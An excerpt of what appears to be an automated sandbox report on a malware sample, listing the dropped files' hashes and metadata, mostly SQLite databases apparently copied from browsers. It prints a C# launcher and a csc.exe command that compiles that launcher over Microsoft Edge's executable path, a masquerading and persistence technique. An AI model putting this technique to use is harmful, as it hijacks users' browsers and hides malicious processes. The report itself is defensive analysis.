                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):403
                                                                    Entropy (8bit):4.969058551687233
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLL3iFkD:JNVQIbSfhWLzIiFkMSfhnSFkD
                                                                    MD5:F5BA3C3BD98B46EA61FE50FE98B64506
                                                                    SHA1:D26262FB650D78CCC65CF399326BEFAE5E88FBAE
                                                                    SHA-256:04086117A5AA5D5D5CEC2662FFC45877C1C6BDA94AECB550FD825CF9DF27263C
                                                                    SHA-512:F85FD82BA8724F72AD211B2DFC2A7B2C319EA630EE1062627C8E420DA725EE30E86A2F606C348957A2CFB50E9A236A126F7328A8B0F4CF9EA277044878AB2869
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\AppReadiness\RuntimeBroker.exe"); } catch { } }).Start();. }.}.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):269
                                                                    Entropy (8bit):5.209935960318579
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fRH:Hu7L//TRRzscQlZ5
                                                                    MD5:97E416C6389A0AF31778201020B4A89F
                                                                    SHA1:6DA4AABE0C30599ED1F3E49B45BAA31CF4C60C8F
                                                                    SHA-256:0B5AA20C9F796A03976A88E67091E3B4667AAF0A46B9B292DB4908A93CAEFCBB
                                                                    SHA-512:3BC30D6663200B1A8593583206AAA09875F3D449981C50BEFE2B7C827A72C80935777AEBE5234A8EB2DDB0CF7BCBAD52DF02F43150A072AF9ED7AD49DDCEE987
                                                                    Malicious:true
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.0.cs"
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):773
                                                                    Entropy (8bit):5.25756860571062
                                                                    Encrypted:false
                                                                    SSDEEP:24:KwI/un/VRzstD8Kax5DqBVKVrdFAMBJTH:xN/VRzE8K2DcVKdBJj
                                                                    MD5:C373BD79131A6A1AD2D0E2EADF2AE954
                                                                    SHA1:0DD3D43A64F88D3F978D1849C347C605C5D821DC
                                                                    SHA-256:A1BF7F856056073823AE2F7A8CDA37F22D9206F3803134A23D1FB0C36B815AE5
                                                                    SHA-512:EE71BF2BB473CEAE0CCE50B386A07BF05B346081077E0F5909279D6FBA73AD4051FAC11C65BDF2015929996110A4D22F9F42B3F460BF64A071646159014B98AC
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
